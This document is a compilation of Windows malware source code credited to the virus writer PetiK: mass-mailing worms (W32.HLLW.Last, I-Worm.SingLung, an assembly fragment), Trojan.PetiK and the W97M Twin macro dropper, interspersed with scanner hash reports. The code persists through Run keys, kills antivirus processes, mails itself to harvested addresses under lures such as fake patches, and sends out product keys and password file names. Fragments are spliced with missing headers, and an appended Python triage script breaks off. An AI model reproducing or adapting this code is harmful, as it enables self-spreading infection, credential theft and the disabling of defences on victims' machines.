push [hmirc]
api WriteFile
push [hmirc]
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
popad
ret
spread_mirc EndP
scan_mail:
xor edx,edx
add esi,21
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,00h
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
f_mail: xor al,al
stosb
pop edi
test edx,edx
je d_scan_mail
call send_mail
cmp verif,10
je end_worm
jmp d_scan_mail
send_mail:
inc verif
pushad
@pushsz "MAPI32.DLL"
api LoadLibraryA
xchg ebx,eax
mapi macro x
push offset sz&x
push ebx
api GetProcAddress
mov x,eax
endm
mapi MAPILogon
mapi MAPISendMail
mapi MAPILogoff
mapi_logon:
xor eax,eax
push offset hMAPI
push eax
push eax
push eax
push eax
push eax
call MAPILogon
test eax,eax
jne end_send_mail
mapi_send_mail:
xor eax,eax
push eax
push eax
push offset MsgWrm
push eax
push [hMAPI]
call MAPISendMail
mapi_logoff:
xor eax,eax
push eax
push eax
push eax
push [hMAPI]
call MAPILogoff
push ebx
api FreeLibrary
end_send_mail:
popad
ret
.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
MAPISendMail dd ?
MAPILogon dd ?
MAPILogoff dd ?
hMAPI dd 0
MsgWrm dd ?
dd offset subjectwrm
dd offset bodywrm
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgToWrm
dd 1
dd offset AttachWrm
MsgFrom dd ?
dd 1
dd offset MsgFrom
dd offset mail_from
dd ?
dd ?
MsgToWrm dd ?
dd 1
dd ?
dd offset mail_addr
dd ?
dd ?
AttachWrm dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
end start
end
File Anthrax.exe received on 05.16.2009 10:44:20 (CET)
Additional information
File size: 6144 bytes
MD5...: 0c6cd035d3c5b84b13d1f54d70bf5fb3
SHA1..: 80bd3e0ec9c6ab27997d7e55d4b0094ebeea26c9
SHA256: 36ee4e185c6b791ae8d38118bd0e00ae3c2135c1bfcd7f3452165a18c96283dc
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
/*
Name of worm : W32.HLLW.Last
Author : PetiK
Size : 28672 byte
Date : 10/12/2001
Comment : My very first (and last) worm coded in C++ (compiled with Borland).
Why this name? I decided to stop coding worms and viruses. During one year I
learnt many things about worms and virii and I thank all people who helped
me.
*/
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argsused // do not generate a compilation listing file
char filename[100];
char windir[100], windr[100];
HKEY hReg;
FILE *htm;
HANDLE infhtm,lSnapshot,myproc;
HWND NAVh;
BOOL rProcessFound;
LPSTR Run = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
LHANDLE session;
MapiMessage *mess;
HINSTANCE hMAPI;
char messId[512],mname[50],maddr[30];
unsigned long count=0;
BYTE done[50];
DWORD siz=sizeof(done);
DWORD type=REG_SZ;
LPSTR Persona=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
SYSTEMTIME syst;
PROCESSENTRY32 uProcess;
WIN32_FIND_DATA ffile;
char *sujet[]={
"New Game for You.",
"Protect your computer against VBS/Worm and VBS/Virus",
"Free Flash Application !",
"Internet Explorer 5.0/6.0 Patch",
"Try WinXP.",
"Free Chat",
};
char *corps[]={
"Hi,\n\nTake a look at this new game found on the web.",
"This tool allows you to protect your computer against the VBS worm/virus.",
"Hi,\n\nVery good application make with Flash 5.",
"There is the last patch for Internet Explorer against the ActiveX's bugs.",
"Run this small program to see a demo of Win XP.",
"Hello,\n\nVery cool program to chat on the net.",
};
char *attachfile[]={
"New_Game.exe",
"Fix_VBSWormVirus.exe",
"Flash_EXE.exe",
"IEPatch.exe",
"Demo_WinXP.exe",
"FreeChat.exe",
};
char *text[]={
"This file is not a Win32 file valid",
"Cannot Open files : It does not appear to be a valid Win32\n\nIf you downloaded the file, try downloading again.",
"Error with Kernel32 :\nThis program will be terminated.",
"Loader Error :\nThis program will be terminated."
};
void Welcome();
void FuckAntivirus();
void htmfile();
void Spread();
{
HMODULE k32=GetModuleHandle("KERNEL32.DLL");
if(k32) {
(FARPROC &)RegSerPro=GetProcAddress(k32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
}
GetModuleFileName(hInst,filename,100);
GetWindowsDirectory((char *)windir,100);
strcpy(windr,windir);
strcat(windir,"\\MSKERN32.EXE");
if ((lstrcmp(filename,windir))!=0) {
Welcome();
}
strcat(windr,"\\MSKern32.exe");
CopyFile(filename,windr,0);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"MS Kernel32",0,REG_SZ, (BYTE *)windr, 100);
RegCloseKey(hReg);
FuckAntivirus();
GetSystemTime(&syst);
if(syst.wDay==1 && syst.wMonth==12) {
CreateDirectory("C:\\PetiK_Dir",0);
SetCurrentDirectory("C:\\PetiK_Dir");
htm = fopen("petikvx.htm","w");
fprintf(htm,"<html><head><title>The Last From PetiK</title></head>\n");
fprintf(htm,"<body bgcolor=\"blue\" text=\"yellow\">\n");
fprintf(htm,"<p align=\"center\"><font size=\"5\">Win32.HLLW.Last is in your computer\n");
fprintf(htm,"<p align=\"center\"><font size=\"5\">This my last worm\n");
fprintf(htm,"<p align=\"center\"><font size=\"3\">Greetz to : all3gro, Benny, Bumblebee, ");
fprintf(htm,"Mandragore, ZeMacroKiller98, the 29A group and the [MATRiX] group.\n");
fprintf(htm,"<p align=\"center\"><font size=\"5\">GOOD BYE\n");
fprintf(htm,"</font></p>\n");
fprintf(htm,"</body></html>");
fclose(htm);
ShellExecute(0,"open","petikvx.htm",0,0,SW_SHOWNORMAL);
Sleep(3000);
MessageBox(NULL,"My last worm.\nCoded by PetiK (c)2001","W32.HLLW.Last", MB_OK|MB_ICONINFORMATION);
}
htmfile();
Sleep(30000);
Spread();
return 0;
}
void Welcome()
{
MessageBeep(MB_ICONHAND);
MessageBox(NULL, text[GetTickCount()&3], filename, MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
}
void FuckAntivirus()
{
register BOOL term;
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
uProcess.dwSize=sizeof(uProcess);
rProcessFound=Process32First(lSnapshot,&uProcess);
while(rProcessFound) {
if(strstr(uProcess.szExeFile,"NAVAPW32.EXE")!=NULL) { // Norton Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
if(strstr(uProcess.szExeFile,"PAVSCHED.EXE")!=NULL) { // Panda Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
rProcessFound=Process32Next(lSnapshot,&uProcess);
}
CloseHandle(lSnapshot);
}
void htmfile()
{
register bool abc=TRUE;
register HANDLE hFile;
register HWND verif;
RegOpenKeyEx(HKEY_USERS,Persona,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Personal",0,&type,done,&siz);
RegCloseKey(hReg);
SetCurrentDirectory(done);
hFile=FindFirstFile("*.ht*",&ffile);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
WritePrivateProfileString("HTM,HTML Files",ffile.cFileName,"Found by W32.HLLW.Last","C:\\liste.txt");
abc=FindNextFile(hFile,&ffile);
}
}
FindClose(hFile);
abc=TRUE;
hFile=FindFirstFile("*.doc",&ffile);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
WritePrivateProfileString("DOC Files",ffile.cFileName,"Found by W32.HLLW.Last","C:\\liste.txt");
abc=FindNextFile(hFile,&ffile);
}
}
SetFileAttributes("C:\\liste.txt",FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN);
}
void Spread()
{
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) {
count=(unsigned long)(syst.wMilliseconds*syst.wMinute);
while(count>5)
count=(unsigned long)(count/2);
strcpy(mname,mess->lpOriginator->lpszName);
strcpy(maddr,mess->lpOriginator->lpszAddress);
mess->ulReserved=0;
mess->lpszSubject=sujet[count];
mess->lpszNoteText=corps[count];
mess->lpszMessageType=NULL;
mess->lpszDateReceived=NULL;
mess->lpszConversationID=NULL;
mess->flFlags=MAPI_SENT;
mess->lpOriginator->ulReserved=0;
mess->lpOriginator->ulRecipClass=MAPI_ORIG;
mess->lpOriginator->lpszName=mess->lpRecips->lpszName;
mess->lpOriginator->lpszAddress=mess->lpRecips->lpszAddress;
mess->nRecipCount=1;
mess->lpRecips->ulReserved=0;
mess->lpRecips->ulRecipClass=MAPI_TO;
mess->lpRecips->lpszName=mname;
mess->lpRecips->lpszAddress=maddr;
mess->nFileCount=1;
mess->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mess->lpFiles, 0, sizeof(MapiFileDesc));
mess->lpFiles->ulReserved=0;
mess->lpFiles->flFlags=NULL;
mess->lpFiles->nPosition=-1;
mess->lpFiles->lpszPathName=filename;
mess->lpFiles->lpszFileName=attachfile[count];
mess->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mess, NULL, NULL);
count++;
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mess->lpFiles);
mFreeBuffer(mess);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
}
File Last.exe received on 05.16.2009 17:43:12 (CET)
Additional information
File size: 28672 bytes
MD5...: bfce6a179fa853c4c0a5bffc6b8c8f72
SHA1..: 6c8f1623c5471d556003928c15bf670175fc4d3d
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
/*
Name : Trojan.PetiK
Author : PetiK
Language : C++/ASM
Start : December 12th 2001
End : December 29th 2001
*/
#include <windows.h>
#include <tlhelp32.h>
#include <mapi.h>
#pragma argused
#pragma inline
// Install Trojan
char filename[100], sysdir[100], sysdr[100], liste[50], pwl[50];
HKEY hReg;
LPSTR Run = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
// Fuck antivirus
HANDLE lSnapshot,myproc;
BOOL rProcessFound;
// Gather information
BYTE owner[100],org[100],key[30],id[30],ver[30];
BYTE page[150];
DWORD sizowner=sizeof(owner),sizorg=sizeof(org),sizkey=sizeof(key),sizid=sizeof(id);
DWORD sizver=sizeof(ver),sizpage=sizeof(page),type=REG_SZ;
LPSTR CurVer="Software\\Microsoft\\Windows\\CurrentVersion",Main="Software\\Microsoft\\Internet Explorer\\Main";
// Send the info
PROCESSENTRY32 uProcess;
WIN32_FIND_DATA Search;
void Bienvenue();
void StopDetect();
void Information();
void SendInfo();
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
HMODULE k32=GetModuleHandle("KERNEL32.DLL");
if(k32) {
(FARPROC &)RegSerPro=GetProcAddress(k32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
}
// Install trojan
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);
strcpy(sysdr,sysdir);
strcat(sysdir,"\\SETUP02.EXE");
if ((lstrcmp(filename,sysdir))!=0) {
Bienvenue();
}
else
{
SendInfo();
}
strcat(sysdr,"\\Setup02.exe");
CopyFile(filename,sysdr,0);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Microsoft Setup",0,REG_SZ, (BYTE *)sysdr, 100);
RegCloseKey(hReg);
StopDetect();
Information();
void StopDetect()
{
register BOOL term;
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
uProcess.dwSize=sizeof(uProcess);
rProcessFound=Process32First(lSnapshot,&uProcess);
while(rProcessFound) {
if(strstr(uProcess.szExeFile,"NAVAPW32.EXE")!=NULL) { // Norton Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
if(strstr(uProcess.szExeFile,"PAVSCHED.EXE")!=NULL) { // Panda Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
rProcessFound=Process32Next(lSnapshot,&uProcess);
}
CloseHandle(lSnapshot);
}
void Information()
{
register bool abc=TRUE;
register HANDLE hFile;
GetSystemDirectory((char *)liste,50);
strcat(liste,"\\liste_troj.txt");
RegOpenKeyEx(HKEY_LOCAL_MACHINE,CurVer,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"RegisteredOwner",0,&type,owner,&sizowner);
RegQueryValueEx(hReg,"RegisteredOrganization",0,&type,org,&sizorg);
RegQueryValueEx(hReg,"ProductKey",0,&type,key,&sizkey);
RegQueryValueEx(hReg,"ProductId",0,&type,id,&sizid);
RegQueryValueEx(hReg,"Version",0,&type,ver,&sizver);
RegCloseKey(hReg);
RegOpenKeyEx(HKEY_CURRENT_USER,Main,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Start Page",0,&type,page,&sizpage);
RegCloseKey(hReg);
WritePrivateProfileString("Info Ordi","Owner",owner,liste);
WritePrivateProfileString("Info Ordi","Organization",org,liste);
WritePrivateProfileString("Info Ordi","ProductKey",key,liste);
WritePrivateProfileString("Info Ordi","ProductId",id,liste);
WritePrivateProfileString("Info Ordi","Version",ver,liste);
WritePrivateProfileString("Info Internet","Page Internet",page,liste);
GetWindowsDirectory((char *)pwl,50);
SetCurrentDirectory(pwl);
hFile=FindFirstFile("*.pwl",&Search);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
WritePrivateProfileString("Info Pass",Search.cFileName,pwl,liste);
abc=FindNextFile(hFile,&Search);
}
}
FindClose(hFile);
}
void SendInfo()
{
_asm
{
DebutAsm:
push 50
push offset liste
call GetSystemDirectoryA
call @liste
db "\liste_troj.txt",0
@liste: push offset liste
call lstrcat
call @wininetdll
db "WININET.DLL",0
@wininetdll:
call LoadLibrary
test eax,eax
jz send
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz End
mov edi,eax
verif: push 00h
push offset Tmp
call edi
dec eax
jnz verif
push ebp
call FreeLibrary
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MsgHdl]
call edi
push 5000
call Sleep
push ebp
call FreeLibrary
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset petikmail
dd offset petikmail
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset liste
dd ?
dd ?
FinAsm:
}
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_ALL_ACCESS,&hReg);
RegDeleteValue(hReg,"Microsoft Setup");
RegCloseKey(hReg);
}
void Bienvenue()
{
// French text reads: "I wish you a happy and prosperous New Year. And all my best wishes." / "HAPPY NEW YEAR !"
MessageBox(NULL,"Je te souhaite une Bonne et Heureuse Nouvelle Année.\nEt tous mes meilleurs voeux.",
"BONNE ANNEE !",MB_OK|MB_ICONINFORMATION);
}
File Trojan_PetiK.exe received on 05.16.2009 20:10:19 (CET)
Additional information
File size: 24064 bytes
MD5...: c12a8711efbf38f0820c827f22269684
SHA1..: 2afd3a9fb4ae7af97c9618b98b87b28894fec2d2
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
/*
Name : I-Worm.SingLung
Author : PetiK
Date : January 23rd 2002
Language : C++/Win32asm
*/
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argused
#pragma inline
char filename[100],sysdir[100],sysdr[100],winhtm[100];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
int i;
HANDLE fd,lSnapshot,myproc;
BOOL rProcessFound;
FILE *vbs;
BYTE desktop[50],favoris[50],personal[50],cache[50];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache);
DWORD type=REG_SZ;
FILE *stopv;
LHANDLE session;
MapiMessage mess;
MapiRecipDesc from;
HINSTANCE hMAPI;
HKEY hReg;
PROCESSENTRY32 uProcess;
SYSTEMTIME systime;
WIN32_FIND_DATA ffile;
HDC dc;
void Welcome();
void StopAV(char *);
void FindFile(char *,char *);
void GetMail(char *,char *);
void sendmail(char *);
void FeedBack();
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
/*
// Worm in RegisterServiceProcess
HMODULE kern32=GetModuleHandle("KERNEL32.DLL");
if(kern32) {
(FARPROC &)RegSerPro=GetProcAddress(kern32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
} */
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);
strcpy(sysdr,sysdir);
strcat(sysdr,"\\MSGDI32.EXE");
if((lstrcmp(filename,sysdr))!=0) {
Welcome();
}
else
{
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
RegCloseKey(hReg);
GetWindowsDirectory((char *)winhtm,100);
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0
end_all_asm:
}
FindFile(desktop,"*.htm");
FindFile(favoris,"*.ht*");
FindFile(personal,"*.ht*");
FindFile(personal,"*.doc");
FindFile(winhtm,".ht*");
FindFile(cache,".ht*");
FreeLibrary(hMAPI);
FeedBack();
}
strcat(sysdir,"\\MsGDI32.exe");
CopyFile(filename,sysdir,FALSE);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Microsoft GDI 32 bits",0,REG_SZ,(BYTE *)sysdir,100);
RegCloseKey(hReg);
}
void Welcome()
{
register char fileWel[100],messWel[25],titWel[25];
strcpy(fileWel,filename);
fileWel[0]=0;
for(i=strlen(filename);i>0 && filename[i]!='\\';i--);
wsprintf(titWel,"Error - %s",fileWel+i+1);
wsprintf(messWel,"File - %s - damaged.\nCannot open this file.",fileWel+i+1);
MessageBox(NULL,messWel,titWel,MB_OK|MB_ICONHAND);
}
hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
if(hf==INVALID_HANDLE_VALUE)
return;
size=GetFileSize(hf,NULL);
if(!size)
return;
if(size<8)
return;
size-=100;
hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
if(!hf2) {
CloseHandle(hf);
return;
}
mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}
i=0;
while(i<size && !test) {
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
test=TRUE;
i+=strlen("mailto:");
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
if(mapped[i]!=' ') {
mail[k]=mapped[i];
k++;
if(mapped[i]=='@')
valid=TRUE;
}
i++;
}
mail[k]=0;
} else
i++;
}
if(!valid)
mail[0]=0;
UnmapViewOfFile(mapped);
CloseHandle(hf2);
CloseHandle(hf);
return;
}
from.lpszName=NULL;
from.ulRecipClass=MAPI_ORIG;
mess.lpszSubject="Secret for you...";
mess.lpszNoteText="Hi Friend,\n\n"
"I send you my last work.\n"
"Mail me if you have some suggests.\n\n"
" See you soon. Best Regards.";
mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mess.lpRecips)
return;
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
mess.lpRecips->lpszName=tos;
mess.lpRecips->lpszAddress=tos;
mess.lpRecips->ulRecipClass=MAPI_TO;
mess.nRecipCount=1;
mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mess.lpFiles)
return;
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
mess.lpFiles->lpszPathName=filename;
mess.lpFiles->lpszFileName="My_Work.exe";
mess.nFileCount=1;
mess.lpOriginator=&from;
mSendMail(0,0,&mess,0,0);
free(mess.lpRecips);
free(mess.lpFiles);
}
void FeedBack()
{
GetSystemTime(&systime);
switch(systime.wDay) {
case 7:
MessageBox(NULL,"It is not with a B-52 that you will stop terrorist groups.\n"
"With this, you stop the life of women and children.",
"Message to USA",MB_OK|MB_ICONHAND);
break;
case 11:
dc=GetDC(NULL);
if(dc)
{
TextOut(dc,300,300,"Can we try to stop the conflicts ? YES OF COURSE !",50);
}
ReleaseDC(NULL,dc);
break;
case 28:
stopv=fopen("StopIntifada.htm","w");
fprintf(stopv,"<html><head><title>Stop Violence between Palestinians and Israeli</title></head>\n");
fprintf(stopv,"<body bgcolor=blue text=yellow>\n");
fprintf(stopv,"<p align=\"center\"><font size=\"5\">HOW TO STOP THE VIOLENCE</font></p><BR>\n");
fprintf(stopv,"<p align=\"left\"><font size=\"3\">-THE ISRAELIS:</font><BR>\n");
fprintf(stopv,"<font>To take the israelis tank out of the palestinians autonomous city.</font><BR>\n");
fprintf(stopv,"<font>Don't bomb civil place after a terrorist bomb attack.</font><BR>\n");
fprintf(stopv,"<font>To arrest and to kill the leaders of terrorist groups.</font><BR><BR>\n");
fprintf(stopv,"<font>-THE PALESTINIANS:</font><BR>\n");
fprintf(stopv,"<font>To stop to provoke the israelis army.</font><BR>\n");
fprintf(stopv,"<font>To stop the terrorist attacks.</font><BR><BR>\n");
fprintf(stopv,"<font>-THE BOTH:</font><BR>\n");
fprintf(stopv,"<font>To try to accept the other people.</font><BR>\n");
fprintf(stopv,"<font>TO ORGANIZE A MEETING BETWEEN ARIEL SHARON AND YASSER ARAFAT !</font><BR><BR>\n");
fprintf(stopv,"<font>Thanx to read this.</font></p>\n");
fprintf(stopv,"</body></html>");
fclose(stopv);
ShellExecute(NULL,"open","StopIntifada.htm",NULL,NULL,SW_SHOWMAXIMIZED);
break;
}
}
File SingLung.exe received on 05.16.2009 19:40:32 (CET)
Additional information
File size: 29184 bytes
MD5...: 460f48b7d7bde2517c1a9a9042682f28
SHA1..: f6ced460439e443aa957c2765328f3b99dcdd252
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
' Name : W97M-W32.Twin
' Author : PetiK
' Language : VBA Word & Assembler
' Date : 01/02/2002
' Size : 2701 byte
Attribute VBA_ModuleType=VBAModule
Sub twin
Sub AutoOpen()
win = Environ("windir")
thisfile = ActiveDocument.Name
full = ActiveDocument.FullName
e = "exe="""
e = e + "4D5A50000200000..."
e = e + "000...000000000000"
e = e + "0000000000"
e = e + """"
f = "fso.CopyFile """
f = f + full
f = f + """, win&""\NetInfo.doc"""
Open "C:\Twin.vbs" For Output As #1
Print #1, "On Error Resume Next"
Print #1, "Set fso=CreateObject(""Scripting.FileSystemObject"")"
Print #1, "Set w=CreateObject(""WScript.Shell"")"
Print #1, "Set win=fso.GetSpecialFolder(0)"
Print #1, "Set Twin=CreateObject(""Outlook.Application"")"
Print #1, "Set deux=Twin.GetNameSpace(""MAPI"")"
Print #1, "Set c=fso.CreateTextFile(""C:\backup.win"")"
Print #1, "c.Close"
Print #1, "For Each polux In deux.AddressLists"
Print #1, "If polux.AddressEntries.Count <> 0 Then"
Print #1, "For jumeaux = 1 To polux.AddressEntries.Count"
Print #1, "Set castor = polux.AddressEntries(jumeaux)"
Print #1, "Set c=fso.OpenTextFile(""C:\backup.win"",8,true)"
Print #1, "c.WriteLine castor.Address"
Print #1, "c.Close"
Print #1, "Next"
Print #1, "End If"
Print #1, "Next"
Print #1, "Set c=fso.OpenTextFile(""C:\backup.win"",8,true)"
Print #1, "c.WriteLine ""#"""
Print #1, "c.Close"
Print #1, ""
Print #1, e
Print #1, "lire=decr(exe)"
Print #1, "Set exfile=fso.CreateTextFile(win&""\AVW32.exe"",true)"
Print #1, "exfile.Write lire"
Print #1, "exfile.Close"
Print #1, f
Print #1, "w.Run win&""\AVW32.exe"", 1, False"
Print #1, "Function decr(octet)"
Print #1, "For hexa = 1 To Len(octet) Step 2"
Print #1, "decr = decr & Chr(""&h"" & Mid(octet, hexa, 2))"
Print #1, "Next"
Print #1, "End Function"
Close #1
Shell "wscript C:\Twin.vbs", vbHide
End Sub
Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "Message for " & Application.UserName & vbCrLf & "How Are You"
.Heading = "W97M/W32ASM.Twin.Worm"
.Animation = msoAnimationSendingMail
.Button = msoButtonSetOK
.Show
End With
End Sub
End Sub
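The AutoOpen macro above builds Twin.vbs with the Win32 executable embedded as one long exe="4D5A..." hex string and a decr() function that rebuilds it two characters at a time with Chr("&h" & Mid(octet, hexa, 2)), then writes it to AVW32.exe and runs it. The Python below is an added triage example for this page, not code from the macro or from PetiK: it pulls such hex payloads out of a dropper script, ports decr() literally (including the odd-length case, where the last Mid() returns a single hex digit), and reports size, hashes and whether the blob carries an MZ/PE signature. The script it parses is constructed inline around a fake DOS/PE stub; the real dropper's hex data is elided on the page and is not reproduced.

```python
"""Extract and triage the hex-encoded executable from a Twin-style VBS dropper."""
import hashlib
import re

# One statement per line of the form  name="4D5A..."  (the dropper's  exe="..."  line).
EXE_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([0-9A-Fa-f]*)"\s*$', re.MULTILINE)


def vbs_decr(octet: str) -> bytes:
    """Literal port of the dropper's decr(): for hexa = 1 to Len step 2,
    Chr("&h" & Mid(octet, hexa, 2)). A trailing single digit is still converted."""
    return bytes(int(octet[i:i + 2], 16) for i in range(0, len(octet), 2))


def extract_hex_payloads(script: str) -> dict:
    """Return {variable_name: decoded_bytes} for every hex-string assignment
    whose decoded bytes start with 'MZ'; other string assignments are ignored."""
    found = {}
    for name, hexstr in EXE_ASSIGN.findall(script):
        if len(hexstr) < 2:
            continue
        blob = vbs_decr(hexstr)
        if blob[:2] == b"MZ":
            found[name] = blob
    return found


def describe(blob: bytes) -> dict:
    """Size, hashes and a PE-signature check (e_lfanew at 0x3C pointing at 'PE\\0\\0')."""
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little") if len(blob) >= 0x40 else 0
    is_pe = blob[:2] == b"MZ" and blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
    return {"size": len(blob), "is_pe": is_pe,
            "md5": hashlib.md5(blob).hexdigest(),
            "sha1": hashlib.sha1(blob).hexdigest()}


def make_sample_dropper() -> str:
    """Constructed stand-in for Twin.vbs: same statement shapes as the macro writes,
    but the payload is a 96-byte fake MZ/PE stub, not the worm."""
    stub = bytearray(b"MZ" + b"\x00" * 0x3E)              # DOS header, e_lfanew at 0x3C
    stub[0x3C:0x40] = (0x40).to_bytes(4, "little")
    stub += b"PE\x00\x00" + b"\x4c\x01"                    # PE signature, machine = i386
    stub += b"\x00" * 26                                   # no real image follows
    hexblob = stub.hex().upper()
    return ("On Error Resume Next\r\n"
            'Set fso=CreateObject("Scripting.FileSystemObject")\r\n'
            'exe="' + hexblob + '"\r\n'
            "lire=decr(exe)\r\n"
            'Set exfile=fso.CreateTextFile(win&"\\AVW32.exe",true)\r\n'
            "exfile.Write lire\r\n"
            "Function decr(octet)\r\n"
            "For hexa = 1 To Len(octet) Step 2\r\n"
            'decr = decr & Chr("&h" & Mid(octet, hexa, 2))\r\n'
            "Next\r\n"
            "End Function\r\n")


if __name__ == "__main__":
    for name, blob in extract_hex_payloads(make_sample_dropper()).items():
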